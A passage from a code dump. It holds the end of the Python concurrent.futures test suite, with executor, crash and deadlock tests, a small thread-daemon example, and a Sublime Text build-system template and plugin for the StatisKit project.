future = self.executor.submit(fn=capture, arg=1)
self.assertEqual(future.result(), ((), {'arg': 1}))
with self.assertRaises(TypeError):
self.executor.submit(arg=1)
def test_map(self):
self.assertEqual(
list(self.executor.map(pow, range(10), range(10))),
list(map(pow, range(10), range(10))))
self.assertEqual(
list(self.executor.map(pow, range(10), range(10), chunksize=3)),
list(map(pow, range(10), range(10))))
def test_map_exception(self):
i = self.executor.map(divmod, [1, 1, 1, 1], [2, 3, 0, 5])
self.assertEqual(i.__next__(), (0, 1))
self.assertEqual(i.__next__(), (0, 1))
self.assertRaises(ZeroDivisionError, i.__next__)
def test_map_timeout(self):
results = []
try:
for i in self.executor.map(time.sleep,
[0, 0, 6],
timeout=5):
results.append(i)
except futures.TimeoutError:
pass
else:
self.fail('expected TimeoutError')
self.assertEqual([None, None], results)
def test_shutdown_race_issue12456(self):
# Issue #12456: race condition at shutdown where trying to post a
# sentinel in the call queue blocks (the queue is full while processes
# have exited).
self.executor.map(str, [2] * (self.worker_count + 1))
self.executor.shutdown()
@test.support.cpython_only
def test_no_stale_references(self):
# Issue #16284: check that the executors don't unnecessarily hang onto
# references.
my_object = MyObject()
my_object_collected = threading.Event()
my_object_callback = weakref.ref(
my_object, lambda obj: my_object_collected.set())
# Deliberately discarding the future.
self.executor.submit(my_object.my_method)
del my_object
collected = my_object_collected.wait(timeout=5.0)
self.assertTrue(collected,
"Stale reference not collected within timeout.")
def test_max_workers_negative(self):
for number in (0, -1):
with self.assertRaisesRegex(ValueError,
"max_workers must be greater "
"than 0"):
self.executor_type(max_workers=number)
def test_free_reference(self):
# Issue #14406: Result iterator should not keep an internal
# reference to result objects.
for obj in self.executor.map(make_dummy_object, range(10)):
wr = weakref.ref(obj)
del obj
self.assertIsNone(wr())
class ThreadPoolExecutorTest(ThreadPoolMixin, ExecutorTest, BaseTestCase):
def test_map_submits_without_iteration(self):
"""Tests verifying issue 11777."""
finished = []
def record_finished(n):
finished.append(n)
self.executor.map(record_finished, range(10))
self.executor.shutdown(wait=True)
self.assertCountEqual(finished, range(10))
def test_default_workers(self):
executor = self.executor_type()
expected = min(32, (os.cpu_count() or 1) + 4)
self.assertEqual(executor._max_workers, expected)
def test_saturation(self):
executor = self.executor_type(4)
def acquire_lock(lock):
lock.acquire()
sem = threading.Semaphore(0)
for i in range(15 * executor._max_workers):
executor.submit(acquire_lock, sem)
self.assertEqual(len(executor._threads), executor._max_workers)
for i in range(15 * executor._max_workers):
sem.release()
executor.shutdown(wait=True)
def test_idle_thread_reuse(self):
executor = self.executor_type()
executor.submit(mul, 21, 2).result()
executor.submit(mul, 6, 7).result()
executor.submit(mul, 3, 14).result()
self.assertEqual(len(executor._threads), 1)
executor.shutdown(wait=True)
class ProcessPoolExecutorTest(ExecutorTest):
@unittest.skipUnless(sys.platform=='win32', 'Windows-only process limit')
def test_max_workers_too_large(self):
with self.assertRaisesRegex(ValueError,
"max_workers must be <= 61"):
futures.ProcessPoolExecutor(max_workers=62)
def test_killed_child(self):
# When a child process is abruptly terminated, the whole pool gets
# "broken".
futures = [self.executor.submit(time.sleep, 3)]
# Get one of the processes, and terminate (kill) it
p = next(iter(self.executor._processes.values()))
p.terminate()
for fut in futures:
self.assertRaises(BrokenProcessPool, fut.result)
# Submitting other jobs fails as well.
self.assertRaises(BrokenProcessPool, self.executor.submit, pow, 2, 8)
def test_map_chunksize(self):
def bad_map():
list(self.executor.map(pow, range(40), range(40), chunksize=-1))
ref = list(map(pow, range(40), range(40)))
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=6)),
ref)
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=50)),
ref)
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=40)),
ref)
self.assertRaises(ValueError, bad_map)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
        # We want to ensure that the traceback from the child process is
# contained in the traceback raised in the main process.
future = self.executor.submit(self._test_traceback)
with self.assertRaises(Exception) as cm:
future.result()
exc = cm.exception
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), futures.process._RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
def test_ressources_gced_in_workers(self):
        # Ensure that the arguments for a job are correctly gc-ed after the
        # job has finished
obj = EventfulGCObj(self.ctx)
future = self.executor.submit(id, obj)
future.result()
self.assertTrue(obj.event.wait(timeout=1))
create_executor_tests(ProcessPoolExecutorTest,
executor_mixins=(ProcessPoolForkMixin,
ProcessPoolForkserverMixin,
ProcessPoolSpawnMixin))
def hide_process_stderr():
import io
sys.stderr = io.StringIO()
def _crash(delay=None):
"""Induces a segfault."""
if delay:
time.sleep(delay)
import faulthandler
faulthandler.disable()
faulthandler._sigsegv()
def _exit():
"""Induces a sys exit with exitcode 1."""
sys.exit(1)
def _raise_error(Err):
"""Function that raises an Exception in process."""
hide_process_stderr()
raise Err()
def _return_instance(cls):
"""Function that returns a instance of cls."""
hide_process_stderr()
return cls()
class CrashAtPickle(object):
"""Bad object that triggers a segfault at pickling time."""
def __reduce__(self):
_crash()
class CrashAtUnpickle(object):
"""Bad object that triggers a segfault at unpickling time."""
def __reduce__(self):
return _crash, ()
class ExitAtPickle(object):
"""Bad object that triggers a process exit at pickling time."""
def __reduce__(self):
_exit()
class ExitAtUnpickle(object):
"""Bad object that triggers a process exit at unpickling time."""
def __reduce__(self):
return _exit, ()
class ErrorAtPickle(object):
"""Bad object that triggers an error at pickling time."""
def __reduce__(self):
from pickle import PicklingError
raise PicklingError("Error in pickle")
class ErrorAtUnpickle(object):
"""Bad object that triggers an error at unpickling time."""
def __reduce__(self):
from pickle import UnpicklingError
return _raise_error, (UnpicklingError, )
class ExecutorDeadlockTest:
TIMEOUT = 15
@classmethod
def _sleep_id(cls, x, delay):
time.sleep(delay)
return x
def _fail_on_deadlock(self, executor):
        # If we did not recover before TIMEOUT seconds, consider that the
        # executor is in a deadlock state and forcefully clean all of its
        # components.
import faulthandler
from tempfile import TemporaryFile
with TemporaryFile(mode="w+") as f:
faulthandler.dump_traceback(file=f)
f.seek(0)
tb = f.read()
for p in executor._processes.values():
p.terminate()
        # It should be safe to call executor.shutdown() here, as all possible
        # deadlocks were broken by terminating the worker processes above.
executor.shutdown(wait=True)
print(f"\nTraceback:\n {tb}", file=sys.__stderr__)
self.fail(f"Executor deadlock:\n\n{tb}")
def test_crash(self):
# extensive testing for deadlock caused by crashes in a pool.
self.executor.shutdown(wait=True)
crash_cases = [
# Check problem occurring while pickling a task in
# the task_handler thread
(id, (ErrorAtPickle(),), PicklingError, "error at task pickle"),
# Check problem occurring while unpickling a task on workers
(id, (ExitAtUnpickle(),), BrokenProcessPool,
"exit at task unpickle"),
(id, (ErrorAtUnpickle(),), BrokenProcessPool,
"error at task unpickle"),
(id, (CrashAtUnpickle(),), BrokenProcessPool,
"crash at task unpickle"),
# Check problem occurring during func execution on workers
(_crash, (), BrokenProcessPool,
"crash during func execution on worker"),
(_exit, (), SystemExit,
"exit during func execution on worker"),
(_raise_error, (RuntimeError, ), RuntimeError,
"error during func execution on worker"),
# Check problem occurring while pickling a task result
# on workers
(_return_instance, (CrashAtPickle,), BrokenProcessPool,
"crash during result pickle on worker"),
(_return_instance, (ExitAtPickle,), SystemExit,
"exit during result pickle on worker"),
(_return_instance, (ErrorAtPickle,), PicklingError,
"error during result pickle on worker"),
# Check problem occurring while unpickling a task in
# the result_handler thread
(_return_instance, (ErrorAtUnpickle,), BrokenProcessPool,
"error during result unpickle in result_handler"),
(_return_instance, (ExitAtUnpickle,), BrokenProcessPool,
"exit during result unpickle in result_handler")
]
for func, args, error, name in crash_cases:
with self.subTest(name):
# The captured_stderr reduces the noise in the test report
with test.support.captured_stderr():
executor = self.executor_type(
max_workers=2, mp_context=get_context(self.ctx))
res = executor.submit(func, *args)
with self.assertRaises(error):
try:
res.result(timeout=self.TIMEOUT)
except futures.TimeoutError:
# If we did not recover before TIMEOUT seconds,
# consider that the executor is in a deadlock state
self._fail_on_deadlock(executor)
executor.shutdown(wait=True)
def test_shutdown_deadlock(self):
        # Test that calling shutdown on the pool does not cause a deadlock
        # if a worker fails after the shutdown call.
self.executor.shutdown(wait=True)
with self.executor_type(max_workers=2,
mp_context=get_context(self.ctx)) as executor:
self.executor = executor # Allow clean up in fail_on_deadlock
f = executor.submit(_crash, delay=.1)
executor.shutdown(wait=True)
with self.assertRaises(BrokenProcessPool):
f.result()
create_executor_tests(ExecutorDeadlockTest,
executor_mixins=(ProcessPoolForkMixin,
ProcessPoolForkserverMixin,
ProcessPoolSpawnMixin))
class FutureTests(BaseTestCase):
def test_done_callback_with_result(self):
callback_result = None
def fn(callback_future):
nonlocal callback_result
callback_result = callback_future.result()
f = Future()
f.add_done_callback(fn)
f.set_result(5)
self.assertEqual(5, callback_result)
def test_done_callback_with_exception(self):
callback_exception = None
def fn(callback_future):
nonlocal callback_exception
callback_exception = callback_future.exception()
f = Future()
f.add_done_callback(fn)
f.set_exception(Exception('test'))
self.assertEqual(('test',), callback_exception.args)
def test_done_callback_with_cancel(self):
was_cancelled = None
def fn(callback_future):
nonlocal was_cancelled
was_cancelled = callback_future.cancelled()
f = Future()
f.add_done_callback(fn)
self.assertTrue(f.cancel())
self.assertTrue(was_cancelled)
def test_done_callback_raises(self):
with test.support.captured_stderr() as stderr:
raising_was_called = False
fn_was_called = False
def raising_fn(callback_future):
nonlocal raising_was_called
raising_was_called = True
raise Exception('doh!')
def fn(callback_future):
nonlocal fn_was_called
fn_was_called = True
f = Future()
f.add_done_callback(raising_fn)
f.add_done_callback(fn)
f.set_result(5)
self.assertTrue(raising_was_called)
self.assertTrue(fn_was_called)
self.assertIn('Exception: doh!', stderr.getvalue())
def test_done_callback_already_successful(self):
callback_result = None
def fn(callback_future):
nonlocal callback_result
callback_result = callback_future.result()
f = Future()
f.set_result(5)
f.add_done_callback(fn)
self.assertEqual(5, callback_result)
def test_done_callback_already_failed(self):
callback_exception = None
def fn(callback_future):
nonlocal callback_exception
callback_exception = callback_future.exception()
f = Future()
f.set_exception(Exception('test'))
f.add_done_callback(fn)
self.assertEqual(('test',), callback_exception.args)
def test_done_callback_already_cancelled(self):
was_cancelled = None
def fn(callback_future):
nonlocal was_cancelled
was_cancelled = callback_future.cancelled()
f = Future()
self.assertTrue(f.cancel())
f.add_done_callback(fn)
self.assertTrue(was_cancelled)
def test_done_callback_raises_already_succeeded(self):
with test.support.captured_stderr() as stderr:
def raising_fn(callback_future):
raise Exception('doh!')
f = Future()
# Set the result first to simulate a future that runs instantly,
# effectively allowing the callback to be run immediately.
f.set_result(5)
f.add_done_callback(raising_fn)
self.assertIn('exception calling callback for', stderr.getvalue())
self.assertIn('doh!', stderr.getvalue())
def test_repr(self):
self.assertRegex(repr(PENDING_FUTURE),
'<Future at 0x[0-9a-f]+ state=pending>')
self.assertRegex(repr(RUNNING_FUTURE),
'<Future at 0x[0-9a-f]+ state=running>')
self.assertRegex(repr(CANCELLED_FUTURE),
'<Future at 0x[0-9a-f]+ state=cancelled>')
self.assertRegex(repr(CANCELLED_AND_NOTIFIED_FUTURE),
'<Future at 0x[0-9a-f]+ state=cancelled>')
self.assertRegex(
repr(EXCEPTION_FUTURE),
'<Future at 0x[0-9a-f]+ state=finished raised OSError>')
self.assertRegex(
repr(SUCCESSFUL_FUTURE),
'<Future at 0x[0-9a-f]+ state=finished returned int>')
def test_cancel(self):
f1 = create_future(state=PENDING)
f2 = create_future(state=RUNNING)
f3 = create_future(state=CANCELLED)
f4 = create_future(state=CANCELLED_AND_NOTIFIED)
f5 = create_future(state=FINISHED, exception=OSError())
f6 = create_future(state=FINISHED, result=5)
self.assertTrue(f1.cancel())
self.assertEqual(f1._state, CANCELLED)
self.assertFalse(f2.cancel())
self.assertEqual(f2._state, RUNNING)
self.assertTrue(f3.cancel())
self.assertEqual(f3._state, CANCELLED)
self.assertTrue(f4.cancel())
self.assertEqual(f4._state, CANCELLED_AND_NOTIFIED)
self.assertFalse(f5.cancel())
self.assertEqual(f5._state, FINISHED)
self.assertFalse(f6.cancel())
self.assertEqual(f6._state, FINISHED)
def test_cancelled(self):
self.assertFalse(PENDING_FUTURE.cancelled())
self.assertFalse(RUNNING_FUTURE.cancelled())
self.assertTrue(CANCELLED_FUTURE.cancelled())
self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.cancelled())
self.assertFalse(EXCEPTION_FUTURE.cancelled())
self.assertFalse(SUCCESSFUL_FUTURE.cancelled())
def test_done(self):
self.assertFalse(PENDING_FUTURE.done())
self.assertFalse(RUNNING_FUTURE.done())
self.assertTrue(CANCELLED_FUTURE.done())
self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.done())
self.assertTrue(EXCEPTION_FUTURE.done())
self.assertTrue(SUCCESSFUL_FUTURE.done())
def test_running(self):
self.assertFalse(PENDING_FUTURE.running())
self.assertTrue(RUNNING_FUTURE.running())
self.assertFalse(CANCELLED_FUTURE.running())
self.assertFalse(CANCELLED_AND_NOTIFIED_FUTURE.running())
self.assertFalse(EXCEPTION_FUTURE.running())
self.assertFalse(SUCCESSFUL_FUTURE.running())
def test_result_with_timeout(self):
self.assertRaises(futures.TimeoutError,
PENDING_FUTURE.result, timeout=0)
self.assertRaises(futures.TimeoutError,
RUNNING_FUTURE.result, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_FUTURE.result, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_AND_NOTIFIED_FUTURE.result, timeout=0)
self.assertRaises(OSError, EXCEPTION_FUTURE.result, timeout=0)
self.assertEqual(SUCCESSFUL_FUTURE.result(timeout=0), 42)
def test_result_with_success(self):
# TODO(brian@sweetapp.com): This test is timing dependent.
def notification():
# Wait until the main thread is waiting for the result.
time.sleep(1)
f1.set_result(42)
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertEqual(f1.result(timeout=5), 42)
t.join()
def test_result_with_cancel(self):
# TODO(brian@sweetapp.com): This test is timing dependent.
def notification():
# Wait until the main thread is waiting for the result.
time.sleep(1)
f1.cancel()
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertRaises(futures.CancelledError, f1.result, timeout=5)
t.join()
def test_exception_with_timeout(self):
self.assertRaises(futures.TimeoutError,
PENDING_FUTURE.exception, timeout=0)
self.assertRaises(futures.TimeoutError,
RUNNING_FUTURE.exception, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_FUTURE.exception, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_AND_NOTIFIED_FUTURE.exception, timeout=0)
self.assertTrue(isinstance(EXCEPTION_FUTURE.exception(timeout=0),
OSError))
self.assertEqual(SUCCESSFUL_FUTURE.exception(timeout=0), None)
def test_exception_with_success(self):
def notification():
# Wait until the main thread is waiting for the exception.
time.sleep(1)
with f1._condition:
f1._state = FINISHED
f1._exception = OSError()
f1._condition.notify_all()
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertTrue(isinstance(f1.exception(timeout=5), OSError))
t.join()
def test_multiple_set_result(self):
f = create_future(state=PENDING)
f.set_result(1)
with self.assertRaisesRegex(
futures.InvalidStateError,
'FINISHED: <Future at 0x[0-9a-f]+ '
'state=finished returned int>'
):
f.set_result(2)
self.assertTrue(f.done())
self.assertEqual(f.result(), 1)
def test_multiple_set_exception(self):
f = create_future(state=PENDING)
e = ValueError()
f.set_exception(e)
with self.assertRaisesRegex(
futures.InvalidStateError,
'FINISHED: <Future at 0x[0-9a-f]+ '
'state=finished raised ValueError>'
):
f.set_exception(Exception())
self.assertEqual(f.exception(), e)
_threads_key = None
def setUpModule():
global _threads_key
_threads_key = test.support.threading_setup()
def tearDownModule():
test.support.threading_cleanup(*_threads_key)
multiprocessing.util._cleanup_tests()
if __name__ == "__main__":
unittest.main()
|
Chap10_Example10.16.py
|
from threading import Thread
def disp():
print('Display function')
threadobj = Thread(target = disp) # D0
print("Before setting thread as daemon: ", threadobj.isDaemon())# D1
threadobj.setDaemon(True)# D2
print("After setting thread as daemon: ", threadobj.isDaemon())# D3
|
sublime_text.py
|
import os
from devops_tools.system import SYSTEM
BUILD_SYSTEM="""
{
"working_dir": "${project_path}",
"target": "statiskit",
"file_regex": "^\\\\[Build error - file \\"(...*?)\\" at line ([0-9]*), (.*)\\\\]$",
"linux":
{
"cmd": "bash -c 'source {{ prefix }}/bin/activate {{ environment }} && scons autowig --diagnostics-color=never && scons --diagnostics-color=never --with-nose-debug=none'",
"shell": true
},
"osx":
{
"cmd": "bash -c 'source {{ prefix }}/bin/activate {{ environment }} && scons autowig && scons --with-nose-debug=none'",
"shell": true
},
"windows":
{
"cmd": "call {{ prefix }}\\\\Scripts\\\\activate.bat {{ environment }} && scons autowig & scons --with-nose-debug=none",
"shell": true
},
"variants":
[
{
"name": "C++",
"linux":
{
"cmd": "bash -c 'source {{ prefix }}/bin/activate {{ environment }} && scons cpp --diagnostics-color=never'",
"shell": true
},
"osx":
{
"cmd": "bash -c 'source {{ prefix }}/bin/activate {{ environment }} && scons cpp'",
"shell": true
},
"windows":
{
"cmd": "call {{ prefix }}\\\\Scripts\\\\activate.bat {{ environment }} & scons cpp",
"shell": true
},
},
{
"name": "Python",
"linux":
{
"cmd": "bash -c 'source {{ prefix }}/bin/activate {{ environment }} && scons py --diagnostics-color=never'",
"shell": true
},
"osx":
{
"cmd": "bash -c 'source {{ prefix }}/bin/activate {{ environment }} && scons py'",
"shell": true
},
"windows":
{
"cmd": "call {{ prefix }}\\\\Scripts\\\\activate.bat {{ environment }} & scons py",
"shell": true
},
},
{
"name": "Test",
"linux":
{
"cmd": "bash -c 'source {{ prefix }}/bin/activate {{ environment }} && scons test --diagnostics-color=never --with-nose-debug=none'",
"shell": true
},
"osx":
{
"cmd": "bash -c 'source {{ prefix }}/bin/activate {{ environment }} && scons test --with-nose-debug=none'",
"shell": true
},
"windows":
{
"cmd": "call {{ prefix }}\\\\Scripts\\\\activate.bat {{ environment }} & scons test --with-nose-debug=none",
"shell": true
},
},
{
"name": "AutoWIG",
"linux":
{
"cmd": "bash -c 'source {{ prefix }}/bin/activate {{ environment }} && scons autowig --diagnostics-color=never'",
"shell": true
},
"osx":
{
"cmd": "bash -c 'source {{ prefix }}/bin/activate {{ environment }} && scons autowig",
"shell": true
},
"windows":
{
"cmd": "call {{ prefix }}\\\\Scripts\\\\activate.bat {{ environment }} & scons autowig",
"shell": true
},
},
{
"name": "Clean",
"linux":
{
"cmd": "bash -c 'source {{ prefix }}/bin/activate {{ environment }} && scons autowig -c; scons -c'",
"shell": true
},
"osx":
{
"cmd": "bash -c 'source {{ prefix }}/bin/activate {{ environment }} && scons autowig -c; scons -c'",
"shell": true
},
"windows":
{
"cmd": "call {{ prefix }}\\\\Scripts\\\\activate.bat {{ environment }} & scons autowig -c & scons -c",
"shell": true
},
}
]
}"""
BUILD_TARGET = """
import collections
import functools
import html
import os
import subprocess
import sys
import threading
import time
import sublime
import sublime_plugin
import re
class ProcessListener(object):
def on_data(self, proc, data):
pass
def on_finished(self, proc):
pass
class AsyncProcess(object):
\"\"\"
Encapsulates subprocess.Popen, forwarding stdout to a supplied
ProcessListener (on a separate thread)
\"\"\"
def __init__(self, cmd, shell_cmd, env, listener, path="", shell=False):
\"\"\" "path" and "shell" are options in build systems \"\"\"
if not shell_cmd and not cmd:
raise ValueError("shell_cmd or cmd is required")
if shell_cmd and not isinstance(shell_cmd, str):
raise ValueError("shell_cmd must be a string")
self.listener = listener
self.killed = False
self.start_time = time.time()
# Hide the console window on Windows
startupinfo = None
if os.name == "nt":
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
# Set temporary PATH to locate executable in cmd
if path:
old_path = os.environ["PATH"]
# The user decides in the build system whether he wants to append $PATH
# or tuck it at the front: "$PATH;C:\\\\new\\\\path", "C:\\\\new\\\\path;$PATH"
os.environ["PATH"] = os.path.expandvars(path)
proc_env = os.environ.copy()
proc_env.update(env)
for k, v in proc_env.items():
proc_env[k] = os.path.expandvars(v)
if shell_cmd and sys.platform == "win32":
# Use shell=True on Windows, so shell_cmd is passed through with the correct escaping
self.proc = subprocess.Popen(
shell_cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE,
startupinfo=startupinfo,
env=proc_env,
shell=True)
elif shell_cmd and sys.platform == "darwin":
            # Use a login shell on OSX, otherwise the user's expected env vars won't be set up
self.proc = subprocess.Popen(
["/bin/bash", "-l", "-c", shell_cmd],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE,
startupinfo=startupinfo,
env=proc_env,
shell=False)
elif shell_cmd and sys.platform == "linux":
# Explicitly use /bin/bash on Linux, to keep Linux and OSX as
# similar as possible. A login shell is explicitly not used for
# linux, as it's not required
self.proc = subprocess.Popen(
["/bin/bash", "-c", shell_cmd],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE,
startupinfo=startupinfo,
env=proc_env,
shell=False)
else:
# Old style build system, just do what it asks
self.proc = subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE,
startupinfo=startupinfo,
env=proc_env,
shell=shell)
if path:
os.environ["PATH"] = old_path
if self.proc.stdout:
threading.Thread(target=self.read_stdout).start()
if self.proc.stderr:
threading.Thread(target=self.read_stderr).start()
def kill(self):
if not self.killed:
self.killed = True
if sys.platform == "win32":
                # terminate would not kill a process opened by the shell cmd.exe;
                # it will only kill cmd.exe itself, leaving the child running
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
subprocess.Popen(
"taskkill /PID " + str(self.proc.pid),
startupinfo=startupinfo)
else:
self.proc.terminate()
self.listener = None
def poll(self):
return self.proc.poll() is None
def exit_code(self):
return self.proc.poll()
def read_stdout(self):
while True:
data = os.read(self.proc.stdout.fileno(), 2**15)
if len(data) > 0:
if self.listener:
self.listener.on_data(self, data)
else:
self.proc.stdout.close()
if self.listener:
self.listener.on_finished(self)
break
def read_stderr(self):
while True:
data = os.read(self.proc.stderr.fileno(), 2**15)
if len(data) > 0:
if self.listener:
self.listener.on_data(self, data)
else:
self.proc.stderr.close()
break
class StatiskitCommand(sublime_plugin.WindowCommand, ProcessListener):
BLOCK_SIZE = 2**14
text_queue = collections.deque()
text_queue_proc = None
text_queue_lock = threading.Lock()
proc = None
errs_by_file = {}
phantom_sets_by_buffer = {}
show_errors_inline = True
def run(
self,
cmd=None,
shell_cmd=None,
file_regex="",
line_regex="",
working_dir="",
encoding="utf-8",
env={},
quiet=False,
kill=False,
update_phantoms_only=False,
hide_phantoms_only=False,
word_wrap=True,
syntax="Packages/Text/Plain text.tmLanguage",
# Catches "path" and "shell"
**kwargs):
if update_phantoms_only:
if self.show_errors_inline:
self.update_phantoms()
return
if hide_phantoms_only:
self.hide_phantoms()
return
# clear the text_queue
self.text_queue_lock.acquire()
try:
self.text_queue.clear()
self.text_queue_proc = None
finally:
self.text_queue_lock.release()
if kill:
if self.proc:
self.proc.kill()
self.proc = None
self.append_string(None, "[Cancelled]")
return
if not hasattr(self, 'output_view'):
# Try not to call get_output_panel until the regexes are assigned
self.output_view = self.window.create_output_panel("exec")
        # Default to the current file's directory if no working directory was given
if working_dir == "" and self.window.active_view() and self.window.active_view().file_name():
working_dir = os.path.dirname(self.window.active_view().file_name())
self.output_view.settings().set("result_file_regex", file_regex)
self.output_view.settings().set("result_line_regex", line_regex)
self.output_view.settings().set("result_base_dir", working_dir)
self.output_view.settings().set("word_wrap", word_wrap)
self.output_view.settings().set("line_numbers", False)
self.output_view.settings().set("gutter", False)
self.output_view.settings().set("scroll_past_end", False)
self.output_view.assign_syntax(syntax)
# Call create_output_panel a second time after assigning the above
# settings, so that it'll be picked up as a result buffer
self.window.create_output_panel("exec")
self.encoding = encoding
self.quiet = quiet
self.proc = None
if not self.quiet:
if shell_cmd:
print("Running " + shell_cmd)
elif cmd:
print("Running " + " ".join(cmd))
sublime.status_message("Building")
show_panel_on_build = sublime.load_settings("Preferences.sublime-settings").get("show_panel_on_build", True)
if show_panel_on_build:
self.window.run_command("show_panel", {"panel": "output.exec"})
self.hide_phantoms()
self.show_errors_inline = sublime.load_settings("Preferences.sublime-settings").get("show_errors_inline", True)
merged_env = env.copy()
if self.window.active_view():
user_env = self.window.active_view().settings().get('build_env')
if user_env:
merged_env.update(user_env)
# Change to the working dir, rather than spawning the process with it,
# so that emitted working dir relative path names make sense
if working_dir != "":
os.chdir(working_dir)
self.debug_text = ""
if shell_cmd:
self.debug_text += "[shell_cmd: " + shell_cmd + "]\\n"
else:
self.debug_text += "[cmd: " + str(cmd) + "]\\n"
self.debug_text += "[dir: " + str(os.getcwd()) + "]\\n"
if "PATH" in merged_env:
self.debug_text += "[path: " + str(merged_env["PATH"]) + "]"
else:
self.debug_text += "[path: " + str(os.environ["PATH"]) + "]"
try:
# Forward kwargs to AsyncProcess
self.proc = AsyncProcess(cmd, shell_cmd, merged_env, self, **kwargs)
self.text_queue_lock.acquire()
try:
self.text_queue_proc = self.proc
finally:
self.text_queue_lock.release()
except Exception as e:
self.append_string(None, str(e) + "\\n")
self.append_string(None, self.debug_text + "\\n")
if not self.quiet:
self.append_string(None, "[Finished]")
def is_enabled(self, kill=False, **kwargs):
if kill:
return (self.proc is not None) and self.proc.poll()
else:
return True
def append_string(self, proc, str):
self.text_queue_lock.acquire()
was_empty = False
try:
if proc != self.text_queue_proc:
# a second call to exec has been made before the first one
# finished, ignore it instead of intermingling the output.
if proc:
proc.kill()
return
if len(self.text_queue) == 0:
was_empty = True
self.text_queue.append("")
available = self.BLOCK_SIZE - len(self.text_queue[-1])
if len(str) < available:
cur = self.text_queue.pop()
self.text_queue.append(cur + str)
else:
self.text_queue.append(str)
finally:
self.text_queue_lock.release()
if was_empty:
sublime.set_timeout(self.service_text_queue, 0)
def service_text_queue(self):
self.text_queue_lock.acquire()
is_empty = False
try:
if len(self.text_queue) == 0:
# this can happen if a new build was started, which will clear
# the text_queue
return
characters = self.text_queue.popleft()
is_empty = (len(self.text_queue) == 0)
finally:
self.text_queue_lock.release()
self.output_view.run_command(
'append',
{'characters': characters, 'force': True, 'scroll_to_end': True})
if self.show_errors_inline and characters.find('\\n') >= 0:
errs = self.output_view.find_all_results_with_text()
errs_by_file = {}
for file, line, column, text in errs:
if file not in errs_by_file:
errs_by_file[file] = []
errs_by_file[file].append((line, column, text))
self.errs_by_file = errs_by_file
self.update_phantoms()
if not is_empty:
sublime.set_timeout(self.service_text_queue, 1)
def finish(self, proc):
if not self.quiet:
elapsed = time.time() - proc.start_time
exit_code = proc.exit_code()
if exit_code == 0 or exit_code is None:
self.append_string(proc, "[Finished in %.1fs]" % elapsed)
else:
self.append_string(proc, "[Finished in %.1fs with exit code %d]\\n" % (elapsed, exit_code))
self.append_string(proc, self.debug_text)
if proc != self.proc:
return
errs = self.output_view.find_all_results()
if len(errs) == 0:
sublime.status_message("Build finished")
else:
sublime.status_message("Build finished with %d errors" % len(errs))
def on_data(self, proc, data):
try:
characters = data.decode(self.encoding)
at_line = characters.endswith('\\n')
characters = characters.splitlines()
file_regexes = ["^[ ]*File \\"(...*?)\\", line ([0-9]*)",
"^(..[^:]*):([0-9]+):?([0-9]+)?:? error: (.*)$"]
variant_dirs = {'^.*/build/(.*)' : '',
'^build/(.*)' : '',
'^.*/site-packages/(.*)' : 'src/py/',
'^.*/include/statiskit/[^/]*/(.*)' : 'src/cpp/'}
cache = set()
for index in range(len(characters)):
matchline = None
for file_regex in file_regexes:
matchline = re.search(file_regex, characters[index])
if matchline and characters[index] not in cache:
cache.add(characters[index])
file, line = matchline.group(1,2)
for variant_dir in variant_dirs:
matchvariant = re.match(variant_dir, file)
if matchvariant:
file = variant_dirs[variant_dir] + matchvariant.group(1)
if os.path.exists(file):
characters[index] = '[Build error - file \"' + file + '" at line ' + line + ", see build results]\\n" + characters[index]
break
break
if matchline:
break
characters = '\\n'.join(characters)
if at_line:
characters += '\\n'
except:
characters = "[Decode error - output not " + self.encoding + "]\\n"
proc = None
# Normalize newlines, Sublime Text always uses a single \\n separator
# in memory.
characters = characters.replace('\\r\\n', '\\n').replace('\\r', '\\n')
self.append_string(proc, characters)
def on_finished(self, proc):
sublime.set_timeout(functools.partial(self.finish, proc), 0)
def update_phantoms(self):
stylesheet = '''
<style>
div.error {
padding: 0.4rem 0 0.4rem 0.7rem;
margin: 0.2rem 0;
border-radius: 2px;
}
div.error span.message {
padding-right: 0.7rem;
}
div.error a {
text-decoration: inherit;
padding: 0.35rem 0.7rem 0.45rem 0.8rem;
position: relative;
bottom: 0.05rem;
border-radius: 0 2px 2px 0;
font-weight: bold;
}
html.dark div.error a {
background-color: #00000018;
}
html.light div.error a {
background-color: #ffffff18;
}
</style>
'''
for file, errs in self.errs_by_file.items():
view = self.window.find_open_file(file)
if view:
buffer_id = view.buffer_id()
if buffer_id not in self.phantom_sets_by_buffer:
phantom_set = sublime.PhantomSet(view, "exec")
self.phantom_sets_by_buffer[buffer_id] = phantom_set
else:
phantom_set = self.phantom_sets_by_buffer[buffer_id]
phantoms = []
for line, column, text in errs:
pt = view.text_point(line - 1, column - 1)
phantoms.append(sublime.Phantom(
sublime.Region(pt, view.line(pt).b),
('<body id=inline-error>' + stylesheet +
'<div class="error">' +
